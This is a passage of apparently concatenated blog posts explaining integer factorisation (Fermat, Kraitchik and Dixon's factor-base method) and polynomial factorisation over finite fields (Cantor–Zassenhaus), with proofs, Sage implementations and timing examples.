Before implementing the algorithm, however, we need a quick word about the last part: given (at least) $d+1$ vectors of $\mathbf{F}_2^d$, how exactly do we find a linear dependence? We create a $(d+1)\times d$ matrix with our vectors as rows, which, using the example of the previous post, gives

\[ M = \begin{pmatrix}

1 & 1 & 0 & 1 \\

0 & 0 & 1 & 0 \\

1 & 1 & 0 & 1 \\

1 & 1 & 1 & 1 \\

1 & 1 & 1 & 1

\end{pmatrix}. \]

This is a $5\times 4$ matrix, which induces by left multiplication ($f: \mathbf{x}\mapsto \mathbf{x}M$) a linear transformation from $\mathbf{F}_2^5$ to $\mathbf{F}_2^4$. Now it is easy to see that each vector of the kernel of $f$ corresponds to a set of rows which add to the zero vector, for example the vector $(1, 0, 1, 0, 0) \in \ker f$ corresponds to the set of rows we used earlier.
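Before handing this job to Sage, we can sanity-check the correspondence in plain Python with a brute-force sketch (not part of the actual algorithm): encode each row of $M$ as a bitmask and enumerate the subsets of rows whose XOR (i.e., sum over $\mathbf{F}_2$) is zero.

```python
# Rows of the matrix M above, encoded as bitmasks (leftmost entry = lowest bit).
rows = [0b1011, 0b0100, 0b1011, 0b1111, 0b1111]

# Brute force: every nonzero subset of rows whose sum over GF(2) (i.e. XOR) is zero.
dependences = []
for mask in range(1, 1 << len(rows)):
    acc = 0
    for i, r in enumerate(rows):
        if (mask >> i) & 1:
            acc ^= r
    if acc == 0:
        dependences.append(mask)

# The kernel vector (1, 0, 1, 0, 0) corresponds to the subset {row 0, row 2},
# i.e. the bitmask 0b00101.
assert 0b00101 in dependences
```

Since the matrix has rank $2$, the kernel has dimension $3$, and the search finds $2^3-1 = 7$ nonzero dependences; brute force is of course exponential, which is exactly why we let linear algebra do this for real instances.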

Thus in the end we just need to obtain the vectors of the kernel of $f$ in order to find our congruences. Fortunately, we need go no further: matrices in Sage have a method for that, and since linear algebra is not our topic here, we will happily use it without caring about how it works. (And actually, we will also freely use is_prime() since primality testing, which is a completely different thing from factoring, is not our topic either.)

This can be implemented as follows. We first need a trial factoring function to weed out small factors, because our algorithm does not like them very much. It is pretty straightforward:

# Trial divide for prime factors in primes.
# Returns the factors found and the unfactored part.
def trial(n, primes):
    factors = []
    for p in primes:
        e = 0
        while n % p == 0:
            e = e + 1
            n = n // p
        if e > 0:
            factors.append((p, e))
        if n == 1:
            break
    return (Factorization(factors), n)

We also need a function to recognise smooth numbers:

# If smooth (i.e., all prime factors in fbase), returns the exponent vector.
# Otherwise, returns None.
def is_smooth(n, fbase):
    lfbase = len(fbase)
    v = vector(GF(2), lfbase + 1)
    for i in range(lfbase):
        while n % fbase[i] == 0:
            v[i+1] = v[i+1] + 1
            n = n // fbase[i]
    if n < 0:
        v[0] = 1
        n = -n
    if n == 1:
        return v
    else:
        return None

The main part of the algorithm:

# Returns a non-trivial factor.
def dixonfact(n, primes):
    b = ceil(exp((1/2)*sqrt(log(n)*log(log(n)))))
    fbase = [p for p in primes if p < b]
    d = len(fbase) + 1
    Tx = []
    TQx = []
    vectors = []
    nvalues = 0
    # Search for enough suitable vectors
    x = ceil(sqrt(n))
    v = is_smooth(x^2 - n, fbase)
    if v is not None:
        Tx.append(x)
        TQx.append(x^2 - n)
        vectors.append(v)
        nvalues = nvalues + 1
    k = 1
    while nvalues < d+5:
        v = is_smooth((x+k)^2 - n, fbase)
        if v is not None:
            Tx.append(x+k)
            TQx.append((x+k)^2 - n)
            vectors.append(v)
            nvalues = nvalues + 1
        v = is_smooth((x-k)^2 - n, fbase)
        if v is not None:
            Tx.append(x-k)
            TQx.append((x-k)^2 - n)
            vectors.append(v)
            nvalues = nvalues + 1
        k = k+1
    # Get relations
    M = matrix(vectors)
    for v in M.kernel():
        if v == 0:
            continue
        x = 1
        y2 = 1
        for i in range(nvalues):
            x = x * Tx[i]^(v[i])
            y2 = y2 * TQx[i]^(v[i])
        y = sqrt(y2)
        if (x+y) % n != 0 and (x-y) % n != 0:
            return gcd(x+y, n)

And finally the main factoring function, which puts everything together. We also treat separately the case where $n$ is a prime power (there is a dedicated algorithm to handle such numbers, which is both simple and efficient, but we omit it here for simplicity):

# Full factorisation.
# If init, we generate the list of primes and do
# trial division with them.
def dixon(n, primes=None, init=True):
    # Special cases
    if is_prime_power(n):
        return factor(n)
    if n == 1:
        return Factorization([])
    if init:
        b = ceil(exp((1/2)*sqrt(log(n)*log(log(n)))))
        primes = prime_range(b)
        F, n = trial(n, primes)
        return Factorization(list(F) + list(dixon(n, primes, False)))
    # We know that n is not a prime power and not 1.
    d = dixonfact(n, primes)
    return Factorization(list(dixon(d, primes, False)) + list(dixon(n//d, primes, False)))

In order to test that it works correctly, we can use a test function like this:

# Test on n random integers from 1 to b (inclusive).
def testdixon(n, b):
    for i in range(n):
        t = cputime()
        N = 1 + ZZ.random_element(b)
        print("[%s/%s] Factoring %s = %s..." % (i+1, n, N, factor(N)))
        myfactor = dixon(N)
        if list(myfactor) != list(factor(N)):
            print("Failed on %s" % N)
            return False
        print("Factored in %s seconds." % cputime(t))
    print("All passed.")
    return True

but it is most meaningful to test it on a *semiprime* (*i.e.*, a product of two distinct primes), since this is normally the most difficult case. For example:

sage: n = 21337797057980567893
sage: t = cputime()
sage: factor(n)
2975772091 * 7170507823
sage: cputime(t)
0.029450000000000198
sage: t = cputime()
sage: dixon(n)
2975772091 * 7170507823
sage: cputime(t)
78.717072
sage: t = cputime()
sage: trial(n, prime_range(ceil(sqrt(n))))
(2975772091, 7170507823)
sage: cputime(t)
298.628159

As we said at the beginning of this post, our algorithm is significantly faster than trial division, but also significantly slower than Sage's factor(), meaning that there is still room for improvement. It is not difficult to convince ourselves that the slowest part is the is_smooth() function, which identifies smooth numbers, so this is where we will concentrate our efforts from now on.


Say we now wish to factor $n = 2587$. The values of $x^2-n$ for various values of $x$ are as follows:

\[ \begin{array}{c | l}

x & x^2-n \\

\hline

51 & 14 \\

52 & 117 \\

53 & 222 \\

61 & 1134 \\

62 & 1257 \\

63 & 1382

\end{array} \]

Kraitchik noticed that some of those numbers factor very easily even using trial division: we have $14 = 2\times 7$ of course, but also $1134 = 2\times 3^4\times 7$. This at once gives us the desired square:

\[ \begin{align*}

14 \times 1134

&= 2\times 7\times 2\times 3^4\times 7 \\

&= 2^2\times 3^4\times 7^2 \\

&= \left(2\times 3^2\times 7\right)^2 \\

&= 126^2,

\end{align*} \]

and thus the congruence $(51\times 61)^2 \equiv 126^2 \pmod n$. We are lucky: neither of $51\times 61 \pm 126$ is a multiple of $n$, and we obtain the non-trivial divisors $\gcd(51\times 61+126, n) = 13$ and $\gcd(51\times 61-126, n) = 199$ of $n$.
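The whole computation can be verified in a few lines of plain Python, with the numbers straight from the text:

```python
import math

n = 2587
x = 51 * 61   # = 3111
y = 126

# The congruence x^2 ≡ y^2 (mod n) holds...
assert (x * x - y * y) % n == 0
# ...and x ≢ ±y (mod n), so the gcds below are non-trivial.
assert x % n != y % n and x % n != (-y) % n
assert math.gcd(x + y, n) == 13
assert math.gcd(x - y, n) == 199
assert 13 * 199 == n
```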

The above method is still rather unsystematic. It was formalised by Brillhart and Morrison in 1975 in an article in which they also presented a factorisation of the seventh Fermat number $F_7 = 2^{2^7}+1$, which they had obtained using their new method. Somewhat surprisingly, it is basically just linear algebra.

What we did above was find values $x^2-n$ which had only “small” prime factors. The first thing we need to do is to define “small”, which we do in a straightforward way: we say that a number has only “small” prime factors if all its prime factors are smaller than a given upper bound $B$ (such numbers are called “$B$-smooth”). We will see later that choosing a suitable $B$ is not completely straightforward, but for now we will be content with $B=7$. So we do as above until we find numbers whose only prime factors are $2$, $3$, $5$, or $7$ (the set $\{2,3,5,7\}$ is then what Brillhart and Morrison call the *factor base*). Let us now try with $n = 3439$: we find

\[ \begin{array}{c | l}

x & x^2-n \\

\hline

59 & 42 = 2\times 3\times 7 \\

62 & 405 = 3^4\times 5 \\

67 & 1050 = 2\times 3\times 5^2\times 7 \\

73 & 1890 = 2\times 3^3\times 5\times 7 \\

143 & 17010 = 2\times 3^5\times 5\times 7

\end{array} \]
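As an aside, recognising a smooth number amounts to repeatedly dividing out the primes of the factor base; a minimal plain-Python sketch (the helper name smooth_part is ours, not from the post):

```python
def smooth_part(n, base):
    """Divide out of n every prime in base; the result is 1 iff n is smooth over base."""
    for p in base:
        while n % p == 0:
            n //= p
    return n

fbase = [2, 3, 5, 7]   # the factor base {2, 3, 5, 7} from the text

assert smooth_part(1050, fbase) == 1     # 1050 = 2 * 3 * 5^2 * 7 is smooth
assert smooth_part(1257, fbase) == 419   # 1257 = 3 * 419 is not (419 is prime)
```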

We define for each of those values its *exponent vector* in a natural way:

\[ \begin{align*}

v(42) &= (1, 1, 0, 1), \\

v(405) &= (0, 4, 1, 0), \\

v(1050) &= (1, 1, 2, 1), \\

v(1890) &= (1, 3, 1, 1), \\

v(17010) &= (1, 5, 1, 1),

\end{align*} \]

and we note that the exponent vector of the product of two values will be the sum of their exponent vectors. We want a product which is a square, and it is clear that a number is a square if and only if all the entries of its exponent vector are even. Thus we are only interested in the parity of the entries of exponent vectors, and not in their precise value, and it seems a good idea to reduce them modulo $2$ to discard the superfluous information. The vectors become

\[ \begin{align*}

v(42) &= (1, 1, 0, 1), \\

v(405) &= (0, 0, 1, 0), \\

v(1050) &= (1, 1, 0, 1), \\

v(1890) &= (1, 1, 1, 1), \\

v(17010) &= (1, 1, 1, 1),

\end{align*} \]

and, seeing them now as vectors with coordinates in $\mathbf{F}_2$, we wish to obtain a set of vectors whose sum is the zero vector. In other words, which are linearly dependent.
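In plain Python, for instance, the reduced vectors of $42$ and $1050$ add to the zero vector, which guarantees that their product is a perfect square:

```python
import math

v42 = [1, 1, 0, 1]     # reduced exponent vector of 42
v1050 = [1, 1, 0, 1]   # reduced exponent vector of 1050

# Their sum over F_2 is the zero vector...
assert [(a + b) % 2 for a, b in zip(v42, v1050)] == [0, 0, 0, 0]
# ...so the product 42 * 1050 is a perfect square:
r = math.isqrt(42 * 1050)
assert r * r == 42 * 1050   # 44100 = 210^2
```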

Here we are lucky because we have plenty of choices, including two very obvious pairs of equal vectors. We can for example use the congruence

\[ \begin{align*}

3953^2

&\equiv (59\times 67)^2 \\

&\equiv 42\times 1050 \\

&\equiv 2\times 3\times 7\times 2\times 3\times 5^2\times 7 \\

&\equiv 2^2\times 3^2\times 5^2\times 7^2 \\

&\equiv \left(2\times 3\times 5\times 7\right)^2 \\

&\equiv 210^2\pmod n,

\end{align*} \]

and since none of $3953\pm 210$ is a multiple of $n$, we obtain the non-trivial divisors $\gcd(3953-210, n) = 19$ and $\gcd(3953+210, n) = 181$.

The strength of this method, however, comes from its systematicity. If the factor base is much larger than in our example, it might be difficult to spot sets of linearly dependent vectors, and in any case, we cannot just tell a computer to look and find them. However, if we let $d$ be the number of primes in our factor base, our exponent vectors will be vectors of the vector space $\mathbf{F}_2^d$, and since this vector space has dimension $d$, linear algebra tells us that we need only find at most $d+1$ vectors in order to be certain to find a linear dependence.

Also, remember that even if we find a set of linearly dependent vectors, which gives a congruence $x^2\equiv y^2\pmod n$, the game is not necessarily over. We also require that $x\not\equiv \pm y\pmod n$, and so we might need to find several congruences (and thus, several sets of linearly dependent vectors) until we find a satisfactory one. Linear algebra helps us here also: if we have gathered a large number of vectors, we have good algorithms from linear algebra which will help us find subsets of linearly dependent vectors.

Choosing a suitable $B$ is not easy. If we choose it small, $B$-smooth numbers will be very rare, and we will thus need to try a large number of values until we find enough numbers with good exponent vectors. On the other hand, if we choose it large, $B$-smooth numbers will be more difficult to identify (since we will need to factor them up to a larger bound), and we will also need more of them (since we need at least as many as there are primes in our factor base, plus one).

Rigorously finding an ideal value of $B$ involves complicated analytic number theory. Two important ideas are that it is better to choose it too large than too small, and also that the ideal value is about $\exp\left(\frac{1}{2}\sqrt{\log n \log\log n}\right)$.
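In plain Python, this rule of thumb is one line; for the small example $n = 2587$ used previously it gives a tiny bound (the exact rounding is a free choice):

```python
import math

def smoothness_bound(n):
    # B ≈ exp((1/2) * sqrt(log n * log log n))
    return math.ceil(math.exp(0.5 * math.sqrt(math.log(n) * math.log(math.log(n)))))

assert smoothness_bound(2587) == 8
```

The bound grows very slowly: it only reaches the hundreds for numbers of cryptographic interest.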

So far, we have only computed $x^2-n$ for $x > \sqrt{n}$, so we always had $x^2-n > 0$. There seems to be no reason to restrict ourselves to positive values. Indeed, continuing with the example $n = 3439$, we find

\[ \begin{array}{c | l}

x & x^2-n \\

\hline

58 & -75 = (-1)\times 3\times 5^2 \\

53 & -630 = (-1)\times 2\times 3^2\times 5\times 7 \\

52 & -735 = (-1)\times 3\times 5\times 7^2 \\

46 & -1323 = (-1)\times 3^3\times 7^2

\end{array} \]

which gives

\[ \begin{align*}

2668^2

&\equiv (58\times 46)^2 \\

&\equiv (-75)\times (-1323) \\

&\equiv (-1)\times 3\times 5^2\times (-1)\times 3^3\times 7^2 \\

&\equiv (-1)^2\times 3^4\times 5^2\times 7^2 \\

&\equiv \left(3^2\times 5\times 7\right)^2 \\

&\equiv 315^2\pmod n,

\end{align*} \]

which gives the non-trivial divisors $\gcd(2668+315, n) = 19$ and $\gcd(2668-315, n) = 181$.

So using negative values seems to work just fine, and actually it has an advantage. As $x$ goes farther away from $\sqrt{n}$, $x^2-n$ goes farther away from $0$, and obviously, the larger an integer is in absolute value, the smaller the probability that it will be smooth. If we use only positive values of $x^2-n$, after a while it will be so large that it will almost never be smooth. On the other hand, if we also use negative values, we will have twice as many values of $x^2-n$ in the same range of absolute value, and thus twice the chance of finding smooth ones.

For this benefit, using negative values has negligible cost: we just add the “prime” $-1$ to our factor base. This does not change the idea of the method: since a square is always positive, we will also need the exponent of $-1$ to be even, just like those of the other primes. The cost is that, since we have one more element in our factor base, we will need to find one more vector to be certain of finding a linear dependence. Since in exchange we obtain twice as many vectors to choose from, this is quite a bargain.
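Concretely, in plain Python, with the extended base $(-1, 2, 3, 5, 7)$ and the two values from the table above:

```python
# Exponent vectors over the extended base (-1, 2, 3, 5, 7).
v_m75 = [1, 0, 1, 2, 0]     # -75   = (-1) * 3 * 5^2
v_m1323 = [1, 0, 3, 0, 2]   # -1323 = (-1) * 3^3 * 7^2

total = [a + b for a, b in zip(v_m75, v_m1323)]
# All entries even, including the exponent of -1: the product is a (positive) square.
assert all(e % 2 == 0 for e in total)
assert (-75) * (-1323) == 315 ** 2
```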

This post is getting long, so we’ll get coding in the next one. We will see Dixon’s algorithm, which is the straightforward implementation of the ideas we have discussed so far, and was introduced by Dixon in 1981. This seems odd, because we have said that Brillhart and Morrison introduced the factor base method in 1975. In fact, they originally applied their method to a different algorithm, which used continued fractions instead of the polynomial $x^2-n$, and was the leading algorithm at the time. Since continued fractions are not very pretty and the continued fractions algorithm is no longer used today, we do not discuss it here.

Some integers with no obvious small divisor, such as for example $8051$, are nonetheless easily factored on paper. One need only notice that

\[ 8051 = 8100-49 = 90^2 - 7^2, \]

and use the well-known identity $a^2-b^2 = (a+b)(a-b)$ to find that $8051 = 83\times 97$.
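The arithmetic is easy to check in plain Python:

```python
n = 8051
assert 90**2 - 7**2 == n
assert (90 + 7) * (90 - 7) == n   # a^2 - b^2 = (a+b)(a-b)
assert 97 * 83 == n
```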

This method of factoring an integer by writing it as a difference of two squares is generally attributed to Fermat. However, although it is always possible to write an odd composite as a difference of two squares (as $ab = \left(\frac{a+b}{2}\right)^2-\left(\frac{a-b}{2}\right)^2$), this method by itself makes for a lousy factoring algorithm. We can implement it in Sage like this:

def fermat(n):
    x = ceil(sqrt(n))
    while not is_square(x^2-n):
        x = x+1
    y = sqrt(x^2-n)
    return (x+y, x-y)

but this algorithm will work only if $n$ has a divisor near its square root, which most numbers do not. On the other hand, the naive factoring algorithm by trial division will work on numbers which have one relatively small factor, which most numbers do, so this algorithm is most often even worse than trial division. However, the most powerful factoring algorithms today are refinements of this simple idea.

The first one was popularised by Kraitchik in the 1920s (although the idea was known at least since Gauss). Instead of looking for integers $x$ and $y$ such that $x^2-y^2$ equals $n$, we ask only that $x^2-y^2$ be a multiple of $n$. Thus, $(x+y)(x-y)$ will be a multiple of $n$, and if it also happens that neither of $x+y$ and $x-y$ is a multiple of $n$, it means that the factors of $n$ are “split” between $x+y$ and $x-y$, and finally that $\gcd(n, x\pm y)$ will be non-trivial divisors of $n$. This gives for example the following algorithm:

def kraitchik(n):
    x = ceil(sqrt(n))
    while True:
        k = 1
        while x^2 - k*n >= 0:
            if is_square(x^2-k*n):
                y = sqrt(x^2-k*n)
                if (x+y) % n != 0 and (x-y) % n != 0:
                    a = gcd(x+y, n)
                    b = gcd(x-y, n)
                    return (a, b, n//(a*b))
            k = k+1
        x = x+1

which, albeit an improvement over the preceding one, is still not at all practical.

In fact, Kraitchik does something else. Instead of trying $x^2-kn$ for various values of $x$ and $k$ until a square is found, he keeps the value $x^2-n$ of the previous Fermat method. However, instead of trying individual values to see if one of them is a square, he keeps the previous values and tries to find a product of such values which is a square. Say we have values $x_1, x_2, \dots, x_k$ such that $\prod \left(x_i^2 - n\right) = y^2$. Since obviously $x_i^2-n \equiv x_i^2 \pmod n$, we obtain that

\[ y^2 \equiv \prod \left(x_i^2-n\right) \equiv \prod x_i^2 \equiv \left(\prod x_i\right)^2 \pmod n, \]

and voilà our congruence of squares.
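This chain of congruences is easy to check numerically in plain Python; the sample values below are arbitrary (they need not produce a square — the point is only that the two products agree modulo $n$):

```python
n = 8051
xs = [91, 95, 103]   # arbitrary sample values of x

prod_vals = 1
prod_xs = 1
for x in xs:
    prod_vals *= x * x - n   # product of the x_i^2 - n
    prod_xs *= x             # product of the x_i

# Since x_i^2 - n ≡ x_i^2 (mod n), the two products agree modulo n.
assert prod_vals % n == (prod_xs ** 2) % n
```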

The problem, now, is how to find our values $x_1,\dots,x_k$ which produce a square. Kraitchik used only trial and error, which is obviously not very suitable for an algorithm. A systematic method for this was not introduced until the 1970s. I will cover it in a coming post.

We are left with the following problem: given a polynomial $A \in \mathbf{F}_p[X]$ which is known to be squarefree and the product of irreducible factors which are all of degree $d$, find these factors. One algorithm to do this was introduced by Cantor and Zassenhaus in 1981.

We may assume that $A$ has at least two factors (if it has only one, it is already irreducible, so we have nothing to do). We also assume $p > 2$ for now. Then for any $T \in \mathbf{F}_p[X]$, we have the following equality:

\[ A = \gcd(A,T)\times \gcd(A,T^{(p^d-1)/2}+1)\times \gcd(A,T^{(p^d-1)/2}-1). \]

This is easy to see: since all the elements of $\mathbf{F}_{p^d}$ are roots of $X^{p^d}-X$ and since $T \in \mathbf{F}_p[X]$, we have that for any $x \in \mathbf{F}_{p^d}$, $T(x) \in \mathbf{F}_{p^d}$ is again a root of $X^{p^d}-X$, and so $x$ is a root of $T^{p^d}-T$. Thus $X^{p^d}-X$ divides $T^{p^d}-T$. This means that every monic irreducible polynomial of degree $d$ divides $T^{p^d}-T$, and so in the end $A$ divides $T^{p^d}-T$, since $A$ is squarefree. Finally, we clearly have the equality

\[ T^{p^d}-T = T(T^{(p^d-1)/2}+1)(T^{(p^d-1)/2}-1), \]

and since those three factors are pairwise relatively prime, the equality follows.

Let now $T$ be monic of degree $e \le 2d-1$. According to the above equality, the common factors of $A$ and $T^{p^d}-T$, which are just the factors of $A$ since $A$ divides $T^{p^d}-T$, are “spread” among the three polynomials $T$, $T^{(p^d-1)/2}+1$, and $T^{(p^d-1)/2}-1$. It seems reasonable to expect that each of the second and third factors will contain about half of them, since the degree of $T^{(p^d-1)/2}\pm 1$ is about half that of $T^{p^d}-T$. Indeed, one can show that if $T$ is chosen at random, the probability that $T^{(p^d-1)/2}-1$ contains at least one, but not all, of the common factors of $A$ and $T^{p^d}-T$ (and so, that $\gcd(A,T^{(p^d-1)/2}-1)$ is a non-trivial factor of $A$) is more than $4/9$.

We will thus normally not have to try too many different $T$s in order to obtain a non-trivial factor $U$, and we can then apply the algorithm recursively to $U$ and $A/U$. We obtain

def czodd(A, d):
    if A.degree() == d:
        return [A]
    p = A.base_ring().characteristic()
    while True:
        T = parent(A).random_element((1, 2*d-1))
        if T.degree() < 1:
            continue
        T = T.monic()
        U = gcd(A, T^((p^d-1)//2)-1)
        if U.degree() > 0 and U.degree() < A.degree():
            return czodd(U, d) + czodd(A//U, d)

This works as expected:

sage: R.<x> = PolynomialRing(GF(5))
sage: czodd( (x+1)*(x+2)*(x+3)*(x+4), 1)
[x + 2, x + 1, x + 3, x + 4]
sage: czodd( (x^2+x+1)*(x^2+2), 2)
[x^2 + 2, x^2 + x + 1]

However, this naive algorithm has the same problem as the one for distinct degree factorisation: we have to manipulate a polynomial ($T^{(p^d-1)/2}-1$) whose degree grows exponentially with $d$, and this slows down our algorithm a lot: it takes several seconds to factor a polynomial with two irreducible factors of degree $8$, when Sage's factor() again takes less than a tenth of a second:

sage: f
x^16 + 2*x^13 + x^12 + 4*x^11 + 2*x^10 + x^9 + 3*x^7 + 4*x^6 + 2*x^5 + 2*x^4 + x^3 + 3*x^2 + 2
sage: t = cputime()
sage: factor(f)
(x^8 + x^7 + 2*x^6 + 3*x^4 + 3*x^3 + x^2 + x + 1) * (x^8 + 4*x^7 + 4*x^6 + 4*x^3 + 3*x^2 + 3*x + 2)
sage: cputime(t)
0.01883699999999955
sage: t = cputime()
sage: czodd(f, 8)
[x^8 + 4*x^7 + 4*x^6 + 4*x^3 + 3*x^2 + 3*x + 2, x^8 + x^7 + 2*x^6 + 3*x^4 + 3*x^3 + x^2 + x + 1]
sage: cputime(t)
2.0217479999999988

Again, we are not interested in $T^{(p^d-1)/2}-1$ itself, only in its GCD with $A$, and since $A$ is of much smaller degree, we work modulo $A$. This time, however, we need to explicitly construct the ring $\mathbf{F}_p[X]/(A)$ and compute $T^{(p^d-1)/2}-1$ in it (in the previous case, we could just reduce modulo $A$ on the fly). This gives:

def czodd(A, d):
    if A.degree() == d:
        return [A]
    R = parent(A)
    RmodA = R.quotient_by_principal_ideal(A)
    p = R.characteristic()
    while True:
        T = parent(A).random_element((1, 2*d-1))
        if T.degree() < 1:
            continue
        T = RmodA(T.monic())
        U = gcd(A, lift(T^((p^d-1)//2))-1)
        if U.degree() > 0 and U.degree() < A.degree():
            return czodd(U, d) + czodd(A//U, d)

which works much better:

sage: t = cputime()
sage: czodd(f, 8)
[x^8 + 4*x^7 + 4*x^6 + 4*x^3 + 3*x^2 + 3*x + 2, x^8 + x^7 + 2*x^6 + 3*x^4 + 3*x^3 + x^2 + x + 1]
sage: cputime(t)
0.036122999999999905

The algorithm for splitting in odd characteristic is based on the fact that for any $T \in \mathbf{F}_p[X]$ we have

\[ A = \gcd(A,T)\times \gcd(A,T^{(p^d-1)/2}+1)\times \gcd(A,T^{(p^d-1)/2}-1), \]

and that if $T$ is chosen at random with sufficiently small degree, then there is a good chance that the second and third GCDs each will contain about half of the factors of $A$, and will thus be non-trivial divisors of $A$. This fails in characteristic $2$ because then $T^{(p^d-1)/2}+1 = T^{(p^d-1)/2}-1$, and so the equality becomes

\[ A = \gcd(A,T)\times \gcd(A, T^{p^d-1}-1), \]

which is useless because then it is almost certain that *all* the factors of $A$ will be in the second GCD, which means that the equality will just give us the trivial factorisation $A = 1\times A$.

What can we do then? For a polynomial $T \in \mathbf{F}_2[X]$, consider

\[ W = T + T^2 + T^4 + \dots + T^{2^{d-1}}. \]

Then we have

\[ A = \gcd(A, W)\times \gcd(A, W + 1). \]

This is easy to see, we have

\[ W^2 = T^2 + T^4 + T^8 + \dots + T^{2^d} \]

(remember that we are in characteristic $2$), and so

\[ W\times (W+1) = W^2+W = T^{2^d}+T, \]

and the same argument as in odd characteristic shows that $A$ divides $T^{2^d}-T$, and the asserted equality follows. Since obviously $W$ and $W+1$ have the same degree, with good probability they will each contain about half of the common factors of $A$ and $T^{2^d}-T$, and $\gcd(A,W)$ will give a non-trivial divisor of $A$. We obtain the following algorithm:

def cz2(A, d):
    if A.degree() == d:
        return [A]
    R = parent(A)
    while True:
        T = R.random_element((1, 2*d-1))
        if T.degree() < 1:
            continue
        W = T
        for i in range(d-1):
            T = T^2 % A
            W = W + T
        U = gcd(A, W)
        if U.degree() > 0 and U.degree() < A.degree():
            return cz2(U, d) + cz2(A//U, d)

which works as expected:

sage: R.<x> = PolynomialRing(GF(2))
sage: A = x^16 + x^14 + x^10 + x^5 + x^3 + x + 1
sage: t = cputime()
sage: factor(A)
(x^8 + x^4 + x^3 + x^2 + 1) * (x^8 + x^6 + x^4 + x^3 + x^2 + x + 1)
sage: cputime(t)
0.03154299999999921
sage: t = cputime()
sage: cz2(A,8)
[x^8 + x^6 + x^4 + x^3 + x^2 + x + 1, x^8 + x^4 + x^3 + x^2 + 1]
sage: cputime(t)
0.023383000000002596
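The key identity $W(W+1) = T^{2^d}+T$ can also be checked directly in plain Python, representing polynomials over $\mathbf{F}_2$ as bitmasks (bit $i$ is the coefficient of $X^i$; the helper names are ours):

```python
def gf2_mul(a, b):
    """Carry-less multiplication = product of GF(2) polynomials as bitmasks."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        b >>= 1
    return r

def gf2_pow(a, k):
    """k-th power of a GF(2) polynomial (naive repeated multiplication)."""
    r = 1
    for _ in range(k):
        r = gf2_mul(r, a)
    return r

d = 3
T = 0b111   # T = X^2 + X + 1

# W = T + T^2 + T^4 + ... + T^(2^(d-1))  (addition over GF(2) is XOR)
W = 0
for i in range(d):
    W ^= gf2_pow(T, 2 ** i)

# W * (W + 1) == T^(2^d) + T
assert gf2_mul(W, W ^ 1) == gf2_pow(T, 2 ** d) ^ T
```

Any choice of $T$ and $d$ works here, since the identity is purely formal.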

We can combine the three previous algorithms to obtain a full factorisation algorithm in $\mathbf{F}_p[X]$:

def polfactor(A):
    if A.base_ring().characteristic() == 2:
        cz = cz2
    else:
        cz = czodd
    factors = []
    for P, e in sqfreefact(A):
        for q, d in ddfact(P):
            for r in cz(q, d):
                factors.append((r, e))
    return factors

We can test it for example like this:

def testfactor(p, pmax, n, d):
    if p is None:
        R.<x> = PolynomialRing(GF(random_prime(pmax)))
    else:
        R.<x> = PolynomialRing(GF(p))
    for i in range(n):
        A = R.random_element(d)
        while A.degree() < 1:
            A = R.random_element(d)
        A = A.monic()
        if set(polfactor(A)) != set(factor(A)):
            print("Failed on %s" % A)
            return False
    return True

to check that our function returns the same factorisation as Sage's factor() function on random polynomials. It seems to work:

sage: testfactor(2, None, 100, 100)
True
sage: testfactor(None, 50, 100, 100)
True

We now have our squarefree polynomial $A_i$, which is the product of all the factors of $A$ with exponent $i$. Our goal is to factor it into $A_i = A_{i,1}A_{i,2}\dots A_{i,\ell}$, where $A_{i,d}$ is the product of all the factors of $A_i$ of degree $d$. This is much simpler than the squarefree factorisation algorithm; it is essentially based on the fact that, over a field $\mathbf{F}_p$, the irreducible factors of $X^{p^n}-X$ are precisely the (monic) irreducible polynomials whose degree is a divisor of $n$.

To ease notation, let $q = p^n$. We first show that all the monic irreducible polynomials of degree $n$ are factors of $X^q-X$. So as not to lengthen our exposition, we will use without proof the fact that there is a field with $q$ elements, say $K$. Now, the multiplicative group $K^\times$ has order $q-1$, meaning that for every element $a \in K^\times$ we have $a^{q-1} = 1$, and so $a^q = a$. Since also $0^q = 0$, we see that all the elements of $K$ are roots of $X^q-X$, and since it cannot have more than $q$ roots, they are all its roots and we have the factorisation

\[ X^q-X = \prod_{a \in K} (X-a). \]
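We can check this factorisation for $p = 5$, $n = 1$ in plain Python with naive coefficient arithmetic (the helper polymul is ours):

```python
p = 5

def polymul(a, b):
    """Multiply two polynomials over F_p, coefficients listed from degree 0 up."""
    r = [0] * (len(a) + len(b) - 1)
    for i, ai in enumerate(a):
        for j, bj in enumerate(b):
            r[i + j] = (r[i + j] + ai * bj) % p
    return r

prod = [1]
for a in range(p):
    prod = polymul(prod, [(-a) % p, 1])   # the factor (X - a)

# X^5 - X over F_5 has coefficients (0, -1, 0, 0, 0, 1) = (0, 4, 0, 0, 0, 1).
assert prod == [0, 4, 0, 0, 0, 1]
```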

Let now $P \in \mathbf{F}_p[X]$ be monic and irreducible of degree $n$. We know that there exists an extension of $\mathbf{F}_p$ in which $P$ has a root, say $\alpha$. The field $\mathbf{F}_p(\alpha)$ has $q$ elements, and since $\alpha$ is in $\mathbf{F}_p(\alpha)$ we have $\alpha^q = \alpha$. This means that $\alpha$ is a root of $X^q-X$, which in turn means that $X^q-X$ is a multiple of the minimal polynomial of $\alpha$. Since this minimal polynomial is $P$, this proves that $P$ is a factor of $X^q-X$, as desired.

We have shown that all the monic irreducible polynomials of degree $n$ are factors of $X^q-X$, and we now look for the others. Let $P \in \mathbf{F}_p[X]$ be an irreducible factor of $X^q-X$. Since $X^q-X$ has all its roots in $K$, $P$ must have all its roots in $K$ also. Let then $\alpha$ be a root of $P$ in $K$. We have $\mathbf{F}_p \subseteq \mathbf{F}_p(\alpha) \subseteq K$, with $[\mathbf{F}_p(\alpha):\mathbf{F}_p]$ being the degree of $P$. Since we also know that $[K:\mathbf{F}_p] = [K:\mathbf{F}_p(\alpha)]\times [\mathbf{F}_p(\alpha):\mathbf{F}_p] = n$, this shows that the degree of $P$ is a divisor of $n$.

Finally, let $d$ be a divisor of $n$ and $P$ be irreducible of degree $d$. Using again our previous result, we see that $P$ is a factor of $X^{p^d}-X$. Now, since $d$ divides $n$, we have that $p^d-1$ divides $p^n-1$, and so that $X^{p^d-1}-1$ divides $X^{p^n-1}-1$. Finally, $X^{p^d}-X$ divides $X^{p^n}-X$, and so since $P$ is a factor of $X^{p^d}-X$, it is a factor of $X^q-X$.
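The divisibility chain used above is easy to verify numerically in plain Python; note that $X^{p^d}-X$ divides $X^{p^n}-X$ already over $\mathbf{Z}$, so the divisibility can even be observed on integer values:

```python
p, d, n = 3, 2, 4   # d divides n

# p^d - 1 divides p^n - 1 ...
assert (p**n - 1) % (p**d - 1) == 0

# ... and X^(p^d) - X divides X^(p^n) - X (over Z, hence on integer values too).
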